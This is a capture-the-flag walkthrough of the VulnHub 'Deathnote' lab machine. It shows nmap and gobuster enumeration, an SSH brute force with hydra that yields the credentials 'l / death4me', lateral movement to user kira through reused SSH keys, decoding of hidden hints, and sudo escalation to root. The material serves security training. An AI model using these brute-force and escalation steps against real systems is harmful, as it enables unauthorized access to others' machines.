Setup Vulhub Machine: –
- First, we have to Download the Mirror image from VulnHub. (https://download.vulnhub.com/deathnote/Deathnote.ova)
- Open Virtual Box and click on Import and then select the downloaded file.
- Once You import successfully, You can now set the interface to Vbox guest addition. This process will help you in the Enumeration phase.
- On completion, Check if the Network Adapter is set to Host-only adapter, or not.
The Walkthrough: –
Step 1:- (Enumeration)
find out the target IP address using NetDiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0
From the Scanning result, we have discovered our target IP address i.e., 192.168.56.112.
We have discovered the IP address, so let’s perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:
- -sS: Used for TCP SYN Scan. It is a quick, default, and most popular scan, that has the ability to scan thousands of ports.
- -sC: Used to perform a script scan using the default set of scripts,
- -sV: Enables version detection, which will detect what versions are running on what port
- -p-: Used to select all ports.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.112
[sudo] password for rootharsh:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 12:54 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
| 256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_ 256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:D6:40:0D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.36 seconds
┌──(rootharsh㉿kali)-[~]
└─$
From the Network scanning, we have found two open ports.
- Port 22/TCP running an SSH service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
- Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.
So, let’s take a look at the web content running on Port 80. To look at the contents ourselves we can open a Web Browser and navigate to the target’s IP address in the URL bar at the top of the window.
Upon attempting to access the webpage through a browser we are presented with the following error.
Here, we can’t connect to the server at “deathnote.vuln”.
This type of error appears due to two underlying reasons:-
- If we have mistyped the URL address in our URL search bar so that the DNS servers can’t find the associated IP address for the mistyped name
- If We never entered any hostname like “deathnote.vuln” into the search bar, but the website expects us to.
This type of problem can be fixed by modifying the Local DNS file named “/hosts” located in the /etc directory. Open a terminal and then type the following command to add the IP address with its associated hostname in the host’s table, which would allow your web client to visit the website which was previously reporting an error.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nano /etc/hosts
Now save it using CTRL + X and hit Enter. You can verify the “/hosts” table using the following command.
Once this configuration is complete, we can proceed to reload the target’s webpage and verify if it loads successfully or not. Since the requested hostname now has an association in your “/hosts” file the website can load without any issues.
After analyzing the URL at the top of the window, I confirm that the running website might be created using WordPress CMS.
As we know WordPress websites can be an easy target as they can easily be left vulnerable. So, we ran the WPScan tool on the target application to identify known vulnerabilities.
note:- WP Scan is used to check, if the running site is vulnerable to WP version, and check if a theme and plugin is up-to-date, or known to be vulnerable.
┌──(rootharsh㉿kali)-[~]
└─$ nmap -sC -sV -v -T4 192.168.56.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 11:56 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
From the output, we have noticed that the running WordPress site is not vulnerable to WP version but we got some interesting and useful mistakes that can help us in terms of a foothold on the server.
They are like,
Headers, which indicates that the running server is hosted using Apache.
XML RPC is enabled, but it is not useful at this moment.
The WordPress readme.txt is enabled, which contains the procedure of installation of WordPress.
The Upload directory has listening enabled which means we can directly access the content within the WordPress directory.
Some other services are enabled you can also have a look at them. So let’s enumerate the target URL. There might be any hidden or hardly accessible directories and pages and that can be done through directory Busting.
Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.
- dir: Used to specify the mode of enumeration,
- -u: Used to specify the target URL,
- -w: Used to specify the path of the wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/wordpress/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/03 14:58:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-admin (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/wp-content (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2023/04/03 14:58:54 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$
As a result of Directory busting, we obtained a WP admin page. As we don’t have a valid username and password so we can’t get login access.
Since we have performed the directory busting on the WordPress directory it means there might be some hidden or hardly accessible directories and pages that exist on “deathnote.vuln”.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/03 15:00:13 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 197]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt (Status: 200) [Size: 68]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
===============================================================
2023/04/03 15:00:14 Finished
===============================================================
┌──(rootharsh㉿kali)-[~]
└─$
From the result of Directory busting, we obtained the “robots.txt” file. Let’s dig into this file and find out if there is any sensitive information that might help us in foothold. Let’s have a look.
From “robots.txt” we discover another hint. That hint seems to be like an image file that has been mistakenly added to the target application. So let us open the file ‘important.jpg’ on the browser.
As a result, there seems to be like contain some error while I try to open the file. So, I decided to download the image file on our Kali machine for further analysis. So open a new terminal and then type the following command:-
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/important.jpg
--2023-04-03 15:13:12-- http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’
important.jpg 100%[======================>] 277 --.-KB/s in 0s
2023-04-03 15:13:12 (57.2 MB/s) - ‘important.jpg’ saved [277/277]
┌──(rootharsh㉿kali)-[~]
└─$
You can find out the downloaded file in the Kali directory main folder.
Let me open this image file from here. As a result you can be noticed with the same error occurs.
There might be some problems with this file. Let me run this file command to determine the type of file.
┌──(rootharsh㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(rootharsh㉿kali)-[~]
└─$
From the output we discovered that the file is in the form of ASCII text, which means it is a text file. So rename the file to (.txt)text and then try to open it.
The hint message indicates a piece of information that could help us login into the target application. Previously, we have seen the “user.txt” file, exist within the upload directory.
Let us open the “user.txt” file in a new tab.
As you can see few users are listed in this wordlist. What if we had a wordlist for passwords, we could perform a brute force attack to obtain access to the network.
Step 2:- (Foothold)
While exploring the upload contents, I have identified that the “notes.txt” file might be a wordlist that may contain some passwords list.
Now, we have wordlists for usernames and passwords. So, let’s perform a Brute force attack to get a valid username with its respective password.
Before that, we have to download these files using the wget command line utility tool.
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
--2023-04-03 15:27:44-- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [text/plain]
Saving to: ‘user.txt’
user.txt 100%[======================>] 91 --.-KB/s in 0s
2023-04-03 15:27:44 (7.17 MB/s) - ‘user.txt’ saved [91/91]
┌──(rootharsh㉿kali)-[~]
└─$ wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
--2023-04-03 15:28:15-- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.112
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.112|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 449 [text/plain]
Saving to: ‘notes.txt’
notes.txt 100%[======================>] 449 --.-KB/s in 0s
2023-04-03 15:28:15 (63.2 MB/s) - ‘notes.txt’ saved [449/449]
┌──(rootharsh㉿kali)-[~]
└─$
The Mostly used tool is “Hydra”, that allows us to perform various kinds of brute force attacks using wordlists.
- -L: Used to load several logins from the specified wordlist.
- -P: Used to load several passwords from the specified wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ hydra -L user.txt -P notes.txt ssh://192.168.56.112
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 15:31:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 279.00 tries/min, 279 tries in 00:01h, 454 to do in 00:02h, 14 active
[22][ssh] host: 192.168.56.112 login: l password: death4me
[STATUS] 265.00 tries/min, 530 tries in 00:02h, 203 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-03 15:34:30
┌──(rootharsh㉿kali)-[~]
└─$
From above we have discovered a username and it’s the password that is marked.
[22][ssh] host: 192.168.56.112 login: l password: death4me
Now we have a valid username and it’s password to log into the server via SSH client tool. So, we can try to log into the server.
┌──(rootharsh㉿kali)-[~]
└─$ ssh l@192.168.56.112
The authenticity of host '192.168.56.112 (192.168.56.112)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.56.112' (ED25519) to the list of known hosts.
l@192.168.56.112's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$
The login was successful. Run the following commands to obtain the user flag.
l@deathnote:~$ ls
user.txt
l@deathnote:~$ cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
l@deathnote:~
The content of the user flag seems to be like a hint which is encoded with the help of the Brain fuck decoder Algorithm. To decode the text we can take help from online decoders.
As you notice, a message appears after decrypting it.
Step 3:- (Privilege Escalation)
Let me run the “id” command to find out the user and group names and numeric IDs like UID, or group ID of the current user or any other user on the server.
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$
Since user l does not have sudo user privilege, we are going to identify further information about the target machine, which could be useful for gaining root access.
Let’s identify the rights and privileges of the current user by executing the sudo -l command.
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$
The output displays that the running user does not have the right to run the sudo command, which means there might be another user which consists of permission to run sudo commands.
To get to know, what is the name of the user, which consists of sudo permissions. You can find them in the home directory. Run the ls command to list the directories within the /home directory.
l@deathnote:~$ cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 19 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 kira
drwxr-xr-x 4 l l 4096 Sep 4 2021 l
l@deathnote:/home$
There are two directories one is Kira and another one is l. It means the user Kira might consist of the root permission.
We don’t have access to the user Kira, yet we can still check the files inside it.
l@deathnote:/home$ cd kira/
l@deathnote:/home/kira$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
l@deathnote:/home/kira$
There are nothing special files, except the “kira.txt” file. Let me have a look at it.
l@deathnote:/home/kira$ cat kira.txt
cat: kira.txt: Permission denied
l@deathnote:/home/kira$
This shows an error because we don’t have the right to open it. It means we have to switch the user to Kira but we don’t have the password.
We can easily switch to the user Kira with the help of SSH. As you can notice there is a directory named “.ssh” which contains access credentials for SSH protocol.
l@deathnote:/home/kira$ cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al
total 12
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$
The “.ssh” directory contains an “authorized_keys” file, which means the file contains public keys for public key authentication. Let me have a look at it.
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$
As you can see, the user l has permission to access through SSH client Tool. Before that, we have to add this authorized key to the .ssh the directory that exists within the user l directory.
l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al
total 36
drwxr-xr-x 4 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 l l 3 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3526 Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4096 Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwx------ 2 l l 4096 Sep 4 2021 .ssh
-rw-r--r-- 1 root root 512 Jul 19 2021 user.txt
l@deathnote:~$
Create a new file for Authorized_keys with the help of vi text-editor:-
l@deathnote:~$ cd .ssh/
l@deathnote:~/.ssh$ ls -al
total 20
drwx------ 2 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 l l 4096 Sep 4 2021 ..
-rw------- 1 l l 1823 Jul 19 2021 id_rsa
-rw-r--r-- 1 l l 393 Jul 19 2021 id_rsa.pub
-rw-r--r-- 1 l l 222 Sep 4 2021 known_hosts
l@deathnote:~/.ssh$ vi authorized_keys
We can verify it using the cat command.
l@deathnote:~/.ssh$ cat authorized_key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZN
h4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAG
HaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V
0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m
i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQI
CFZ6z l@deathnote
l@deathnote:~/.ssh$
As this file does not have executable permission, so we have to set permission using the following command.
l@deathnote:~/.ssh$ ls -al
total 24
drwx—— 2 l l 4096 Sep 8 07:23 .
drwxr-xr-x 4 l l 4096 Sep 4 2021 ..
-rw-r–r– 1 l l 393 Sep 8 07:23 authorized_keys
-rw——- 1 l l 1823 Jul 19 2021 id_rsa
-rw-r–r– 1 l l 393 Jul 19 2021 id_rsa.pub
-rw-r–r– 1 l l 444 Sep 8 07:25 known_hosts
l@deathnote:~/.ssh$ chmod +x authorized_keys
l@deathnote:~/.ssh$
Now run the SSH client tool to switch the user to Kira.
l@deathnote:~/.ssh$ ssh kira@192.168.56.112
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$
We have successfully switched the user to Kira and we have the right to read the content within the “kira.txt” file.
kira@deathnote:~$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw——- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r–r– 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r–r– 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx—— 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r–r– 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
kira@deathnote:~$ cat kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$
This file contains some binary text, which seems to be encoded using the base64 algorithm. Let me decode it.
kira@deathnote:~$ echo “cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp” | base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$
From the output, we have discovered that there is an “/opt” directory that might contain something special. Let me change the directory and also list the files and directory.
kira@deathnote:~$ cd /opt/
kira@deathnote:/opt$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Aug 29 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 root root 4096 Aug 29 2021 L
kira@deathnote:/opt$
Here is another directory. Let me change to this directory.
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 29 2021 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case
kira@deathnote:/opt/L$
Directory L contains two more directories. Let’s have a look at the “fake-notebook-rule” directory.
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29 2021 .
drwxr-xr-x 4 root root 4096 Aug 29 2021 ..
-rw-r–r– 1 root root 84 Aug 29 2021 case.wav
-rw-r–r– 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$
The “fake notebook rule” contains two important files. Among them, one is a music file (case.wav) and another one is a hint, which is in form of text. Let me have a look, what are the hints.
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$
The hint emphasizes us to use the cyberchef tool, which means there might be an encoded text that exists here.
Let me run file command line Utility tool to determine the type of file:-
kira@deathnote:/opt/L/fake-notebook-rule$ file case.wav
case.wav: ASCII text
kira@deathnote:/opt/L/fake-notebook-rule$
The “case.wav” is not an audio file, it is a text file. Let me open it using the cat command.
kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$
The “case.wav” contains hexadecimal digits which can be decoded using the cyberchef.
The output seems to be in the form of base64. Let me decode it.
Once you decoded it, you noticed the password for the user Kira.
Run sudo -l command to list the allowed and forbidden commands for the invoking user on the current host.
kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$ kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$
Kira has all permission, which means we successfully escalate the highest privilege. To obtain the root flag, simply change the directory to the /root path.
kira@deathnote:/opt/L/fake-notebook-rule$ cd /root
bash: cd: /root: Permission denied
kira@deathnote:/opt/L/fake-notebook-rule$ sudo su
root@deathnote:/opt/L/fake-notebook-rule# cd /root
root@deathnote:~# ls
root.txt
root@deathnote:~# cat root.txt
:::::::: :::::::: :::: ::: :::::::: ::::::::: ::: ::::::::::: ::::::::
:+: :+: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#+ +:+ +#+ +:+ +#+ :#: +#++:++#: +#++:++#++: +#+ +#++:++#++
+#+ +#+ +#+ +#+ +#+#+# +#+ +#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######## ######## ### #### ######## ### ### ### ### ### ########
##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~#
Congratulation! On completion of the CTFchallenge.